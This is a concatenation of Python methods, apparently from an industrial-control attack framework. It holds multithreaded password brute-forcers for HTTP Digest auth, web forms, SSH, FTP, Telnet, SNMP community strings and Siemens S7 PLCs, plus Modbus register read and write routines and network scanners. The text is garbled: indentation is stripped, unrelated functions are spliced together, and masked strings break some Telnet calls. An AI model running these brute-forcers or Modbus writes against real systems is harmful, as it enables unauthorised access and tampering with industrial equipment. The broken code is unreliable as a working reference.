def attack(self):
url = "{}:{}{}".format(self.target, self.port, self.path)
response = http_request(method="GET", url=url)
if response is None:
return
if response.status_code != 401:
print_status("Target is not protected by Digest Auth")
return
if self.usernames.startswith('file://'):
usernames = open(self.usernames[7:], 'r')
else:
usernames = [self.usernames]
if self.passwords.startswith('file://'):
passwords = open(self.passwords[7:], 'r')
else:
passwords = [self.passwords]
collection = itertools.product(usernames, passwords)
with Threads.ThreadPoolExecutor(self.threads) as executor:
for record in collection:
executor.submit(self.target_function, url, record)
if self.credentials:
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
printTable(headers, *self.credentials)
else:
print_error("Credentials not found")
def run(self):
if self.mode is 'read':
self.read()
elif self.mode is 'write':
self.write()
else:
print_error("Mode: " + self.mode + " doesn't exist.")
def attack(self):
url = "{}:{}{}".format(self.target, self.port, self.path)
response = http_request("GET", url)
if response is None:
return
if response.status_code != 401:
print_status("Target is not protected by Digest Auth")
return
if self.defaults.startswith('file://'):
defaults = open(self.defaults[7:], 'r')
else:
defaults = [self.defaults]
with Threads.ThreadPoolExecutor(self.threads) as executor:
for record in defaults:
username, password = record.split(':')
executor.submit(self.target_function, url, username, password)
if self.credentials:
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
printTable(headers, *self.credentials)
else:
print_error("Credentials not found")
defaults.close()
def attack(self):
try:
tn = telnetlib.Telnet(self.target, self.port)
tn.expect(["login: "******"Login: "******"Connection error {}:{}".format(
self.target, self.port))
return
if self.usernames.startswith('file://'):
usernames = open(self.usernames[7:], 'r')
else:
usernames = [self.usernames]
if self.passwords.startswith('file://'):
passwords = open(self.passwords[7:], 'r')
else:
passwords = [self.passwords]
collection = LockedIterator(itertools.product(usernames, passwords))
self.run_threads(self.threads, self.target_function, collection)
if len(self.credentials):
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
printTable(headers, *self.credentials)
else:
print_error("Credentials not found")
def attack(self):
ssh = paramiko.SSHClient()
try:
ssh.connect(self.target, port=self.port)
except socket.error:
print_error("Connection error: %s:%s" %
(self.target, str(self.port)))
ssh.close()
return
except:
pass
ssh.close()
if self.defaults.startswith('file://'):
defaults = open(self.defaults[7:], 'r')
else:
defaults = [self.defaults]
collection = LockedIterator(defaults)
self.run_threads(self.threads, self.target_function, collection)
if len(self.credentials):
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
printTable(headers, *self.credentials)
else:
print_error("Credentials not found")
def attack(self):
ftp = ftplib.FTP()
try:
ftp.connect(self.target, port=int(self.port), timeout=10)
except (socket.error, socket.timeout):
print_error("Connection error: %s:%s" %
(self.target, str(self.port)))
ftp.close()
return
except:
pass
ftp.close()
if self.defaults.startswith('file://'):
defaults = open(self.defaults[7:], 'r')
else:
defaults = [self.defaults]
collection = LockedIterator(defaults)
self.run_threads(self.threads, self.target_function, collection)
if len(self.credentials):
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
printTable(headers, *self.credentials)
else:
print_error("Credentials not found")
def target_function(self, running, data):
module_verbosity = boolify(self.verbose)
name = threading.current_thread().name
print_status(name, 'thread is starting...', verbose=module_verbosity)
s7_client = S7Client()
s7_client.connect()
if not module_verbosity:
s7_client.logger.setLevel(50)
while running.is_set():
try:
string = data.next().strip()
if len(string) > 8:
continue
s7_client.check_privilege()
if s7_client.protect_level == 1:
print_error("Target didn't set password.")
return
s7_client.auth(string)
if s7_client.authorized:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {}: Valid password string found - String: '{}'".format(
self.target, self.port, name, string), verbose=module_verbosity)
self.strings.append((self.target, self.port, string))
else:
print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(
self.target, self.port, name, string), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'thread is terminated.', verbose=module_verbosity)
def run(self):
try:
arguments = "-T{s} -n -PR -sn "
nm = nmap.PortScanner()
nm.scan(hosts=self.target, arguments=arguments.format(s=self.speed))
for host in nm.all_hosts():
try:
ipv4 = nm[host]['addresses']['ipv4']
mac = nm[host]['addresses']['mac']
vendor = nm[host]['vendor'][mac]
except Exception as e:
if 'mac' in str(e):
mac = 'Unknown'
vendor = 'Unknown'
if 'vendor' in str(e):
vendor = 'Unknown'
finally:
self.result.append([ipv4, mac, vendor])
ipv4 = ""
mac = ""
vendor = ""
unique_device = [list(x) for x in set(tuple(x) for x in self.result)]
unique_device = sorted(unique_device, key=lambda x: (x[0], x[1]))
if len(self.result) > 0:
print_success("Found %s devices." % len(self.result))
printTable(TABLE_HEADER, *unique_device, **{'max_column_length': 50})
print('\r')
self.result = []
else:
print_error("Didn't find any device on network %s" % self.target)
except:
print_error("Discovery Error. Aborting.")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, 'thread is starting...', verbose=module_verbosity)
cmdGen = cmdgen.CommandGenerator()
while running.is_set():
try:
string = data.next().strip()
errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd(
cmdgen.CommunityData(string, mpModel=self.version - 1),
cmdgen.UdpTransportTarget((self.target, self.port)),
'1.3.6.1.2.1.1.1.0',
)
if errorIndication or errorStatus:
print_error(
"Target: {}:{} {}: Invalid community string - String: '{}'"
.format(self.target, self.port, name, string),
verbose=module_verbosity)
else:
if boolify(self.stop_on_success):
running.clear()
print_success(
"Target: {}:{} {}: Valid community string found - String: '{}'"
.format(self.target, self.port, name, string),
verbose=module_verbosity)
self.strings.append((self.target, self.port, string))
except StopIteration:
break
print_status(name, 'thread is terminated.', verbose=module_verbosity)
def read(self):
try:
output = subprocess.check_output(
['modbus', 'read', self.target, self.address, self.limit],
stderr=subprocess.STDOUT)
for x in output.decode().split('\n'):
if x is not "":
print_success(x)
except:
print_error("Connection Error. Aborting.")
def write(self):
try:
print_status("Writing '" + self.value + "' in " + self.address +
".")
subprocess.call(
['modbus', 'write', self.target, self.address, self.value],
stderr=subprocess.STDOUT)
print_success("Executed successfully.")
except:
print_error("Connection Error. Aborting.")
def connect(self, target, port):
try:
sock = socket.socket()
sock.connect((target, port))
sock.settimeout(self.timeout)
self._connection = StreamSocket(sock, Raw)
return True
except ConnectionRefusedError as e:
print_error("Conection was refused.")
return False
def send_receive_packet(self, packet):
if self._connection:
try:
rsp = self._connection.sr1(packet, timeout=self.timeout)
return rsp
except Exception as err:
print_error(err)
return None
else:
print_error("Please create connect before send packet!")
def send_modbus_packet(self, packet):
if self._connection:
try:
self._connection.send(packet)
except Exception as err:
print_error(err)
return None
else:
print_error("Please create connect before send packet!")
def receive_packet(self):
if self._connection:
try:
rsp = self._connection.recv()
return rsp
except Exception as err:
print_error(err)
return None
else:
print_error("Please create connect before receive packet!")
def receive_modbus_packet(self):
if self._connection:
try:
rsp = self._connection.recv()
if rsp:
rsp = ModbusHeaderResponse(str(rsp))
return rsp
except Exception as err:
print_error(err)
return None
else:
print_error("Please create connect before receive packet!")
def attack(self):
# todo: check if service is up
if self.snmp.startswith('file://'):
snmp = open(self.snmp[7:], 'r')
else:
snmp = [self.snmp]
collection = LockedIterator(snmp)
self.run_threads(self.threads, self.target_function, collection)
if len(self.strings):
print_success("Credentials found!")
headers = ("Target", "Port", "Community Strings")
printTable(headers, *self.strings)
else:
print_error("Valid community strings not found")
def attack(self):
# todo: check if service is up
if self.password.startswith('file://'):
s7_pass = open(self.password[7:], 'r')
else:
s7_pass = [self.password]
collection = LockedIterator(s7_pass)
self.run_threads(self.threads, self.target_function, collection)
if len(self.strings):
print_success("Credentials found!")
headers = ("Target", "Port", "password")
printTable(headers, *self.strings)
else:
print_error("Valid password not found")
def run(self):
self.result = []
#conf.verb = self.verbose
nm = port_scan(protocol='TCP', target=self.target, port=self.port)
for host in nm.all_hosts():
if nm[host]['tcp'][self.port]['state'] == "open":
print_success("Host: %s, port:%s is open" % (host, self.port))
self.get_target_info(host=host, port=self.port)
unique_device = [list(x) for x in set(tuple(x) for x in self.result)]
unique_device = sorted(unique_device, key=lambda x: (x[5], x[6]))
if len(self.result) > 0:
print_success("Find %s targets" % len(self.result))
printTable(TABLE_HEADER, *unique_device, **{'max_column_length': 20})
print('\r')
else:
print_error("Didn't find any target on network %s" % self.target)
def attack(self):
url = sanitize_url("{}:{}{}".format(self.target, self.port,
self.get_form_path()))
try:
requests.get(url, verify=False)
except (requests.exceptions.MissingSchema,
requests.exceptions.InvalidSchema):
print_error("Invalid URL format: %s" % url)
return
except requests.exceptions.ConnectionError:
print_error("Connection error: %s" % url)
return
# authentication type
if self.form == 'auto':
form_data = self.detect_form()
if form_data is None:
print_error("Could not detect form")
return
(form_action, self.data) = form_data
if form_action:
self.path = form_action
else:
self.data = self.form
print_status("Using following data: ", self.data)
# invalid authentication
self.invalid_auth()
# running threads
if self.usernames.startswith('file://'):
usernames = open(self.usernames[7:], 'r')
else:
usernames = [self.usernames]
if self.passwords.startswith('file://'):
passwords = open(self.passwords[7:], 'r')
else:
passwords = [self.passwords]
collection = LockedIterator(itertools.product(usernames, passwords))
self.run_threads(self.threads, self.target_function, collection)
if len(self.credentials):
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
printTable(headers, *self.credentials)
else:
print_error("Credentials not found")
def target_function(self, running, data):
module_verbosity = Validators.boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
user, password = data.next()
user = user.strip()
password = password.strip()
postdata = self.data.replace("{{USER}}", user).replace(
"{{PASS}}", password)
r = requests.post(url,
headers=headers,
data=postdata,
verify=False)
l = len(r.text)
if l < self.invalid["min"] or l > self.invalid["max"]:
if Validators.boolify(self.stop_on_success):
running.clear()
print_success(
"Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user, password),
verbose=module_verbosity)
self.credentials.append(
(self.target, self.port, user, password))
else:
print_error(
name,
"Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user, password),
verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.', verbose=module_verbosity)
def target_function(self, url, creds):
name = threading.current_thread().name
user, password = creds
user = user.encode('utf-8').strip()
password = password.encode('utf-8').strip()
response = http_request(method="GET", url=url, auth=(user, password))
if response is not None and response.status_code != 401:
print_success(
"Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user, password),
verbose=self.verbosity)
self.credentials.append((self.target, self.port, user, password))
if self.stop_on_success:
raise Threads.StopThreadPoolExecutor
else:
print_error(
"Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user, password),
verbose=self.verbosity)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
line = data.next().split(":")
user = line[0].strip()
password = line[1].strip()
ssh.connect(self.target,
int(self.port),
timeout=5,
username=user,
password=password)
except StopIteration:
break
except paramiko.ssh_exception.SSHException as err:
ssh.close()
print_error(
"Target: {}:{} {}: {} Username: '******' Password: '******'".
format(self.target, self.port, name, err, user, password),
verbose=module_verbosity)
else:
if boolify(self.stop_on_success):
running.clear()
print_success(
"Target: {}:{} {} Authentication Succeed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user, password),
verbose=module_verbosity)
self.credentials.append(
(self.target, self.port, user, password))
print_status(name, 'process is terminated.', verbose=module_verbosity)
def get_target_info(self, host, port):
product_name = ''
device_type = ''
vendor = ''
revision = ''
serial_number = ''
slot = ''
ip_address = host
target = ModbusClient()
target.connect(host, port)
for slot_num in range(self.max_slot + 1):
print_status("Tring to scan %s with Slot%s" % (host, slot_num))
try:
product_name, device_type, vendor, revision, serial_number = \
target.get_target_info(port_segment=slot_num)
print(product_name, device_type, vendor, revision, serial_number)
slot = slot_num
ip_address = host
if serial_number != '':
self.result.append([product_name, device_type, vendor, revision, serial_number,
str(slot), ip_address])
except Exception as err:
print_error(err)
return False
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, 'process is starting...', verbose=module_verbosity)
ftp = ftplib.FTP()
while running.is_set():
try:
line = data.next().split(":")
user = line[0].strip()
password = line[1].strip()
except StopIteration:
break
else:
retries = 0
while retries < 3:
try:
ftp.connect(self.target,
port=int(self.port),
timeout=10)
break
except:
print_error(
"{} Connection problem. Retrying...".format(name),
verbose=module_verbosity)
retries += 1
if retries > 2:
print_error(
"Too much connection problems. Quiting...",
verbose=module_verbosity)
return
try:
ftp.login(user, password)
if boolify(self.stop_on_success):
running.clear()
print_success(
"Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user, password),
verbose=module_verbosity)
self.credentials.append(
(self.target, self.port, user, password))
except:
print_error(
"Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user, password),
verbose=module_verbosity)
ftp.close()
print_status(name, 'process is terminated.', verbose=module_verbosity)
def send_receive_modbus_packet(self, packet):
func_code = packet.func_code
if self._connection:
try:
rsp = self._connection.sr1(packet, timeout=self.timeout)
if rsp:
rsp = ModbusHeaderResponse(str(rsp))
if rsp.haslayer(modbus_response_classes[func_code]):
return rsp
elif rsp.haslayer(GenericError):
print_error("Got error with error code:%s" %
rsp.exceptCode)
return None
except Exception as err:
print_error(err)
return None
else:
print_error("Please create connect before send packet!")
def run(self):
try:
try:
if self.target == "":
if self.mode == 'active':
p = subprocess.Popen(['netdiscover', '-i', self.iface, '-P', '-N'], stdout=subprocess.PIPE)
else:
p = subprocess.Popen(['netdiscover', '-i', self.iface, '-p', '-P', '-N'],
stdout=subprocess.PIPE)
else:
if self.mode == 'active':
p = subprocess.Popen(['netdiscover', '-i', self.iface, '-r', self.target, '-P', '-N'],
stdout=subprocess.PIPE)
else:
p = subprocess.Popen(['netdiscover', '-i', self.iface, '-r', self.target, '-p', '-P', '-N'],
stdout=subprocess.PIPE)
output, error = p.communicate(timeout=self.timeout)
except:
p.kill()
output, error = p.communicate()
for x in output.decode().split('\n'):
if x != "":
if len(x.split()) >= 5:
self.result.append([x.split()[0],x.split()[1],x.split()[2], x.split()[3], " ".join(x.split()[4:])])
else:
self.result.append([x.split()[0], x.split()[1], x.split()[2], x.split()[3], ""])
unique_device = [list(x) for x in set(tuple(x) for x in self.result)]
unique_device = sorted(unique_device, key=lambda x: (x[0], x[1]))
if len(self.result) > 0:
print_success("Found %s devices." % len(self.result))
printTable(TABLE_HEADER, *unique_device, **{'max_column_length': 50})
print('\r')
self.result = []
else:
print_error("Didn't find any device on network %s" % self.target)
except Exception as e:
print_error(e)
print_error("Discovery Error. Aborting. May increase timeout.")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
line = data.next().split(":")
user = line[0].strip()
password = line[1].strip()
except StopIteration:
break
else:
retries = 0
while retries < 3:
try:
tn = telnetlib.Telnet(self.target, self.port)
tn.expect(["Login: "******"login: "******"\r\n")
tn.expect(["Password: "******"password"], 5)
tn.write(password + "\r\n")
tn.write("\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"],
5)
tn.close()
if i != -1:
print_error(
"Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user,
password),
verbose=module_verbosity)
else:
if any(map(lambda x: x in res, [
"#", "$", ">"
])) or len(res) > 500: # big banner e.g. mikrotik
if boolify(self.stop_on_success):
running.clear()
print_success(
"Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user,
password),
verbose=module_verbosity)
self.credentials.append(
(self.target, self.port, user, password))
tn.close()
break
except EOFError:
print_error(name,
"Connection problem. Retrying...",
verbose=module_verbosity)
retries += 1
if retries > 2:
print_error(
"Too much connection problems. Quiting...",
verbose=module_verbosity)
return
continue
print_status(name, 'process is terminated.', verbose=module_verbosity)
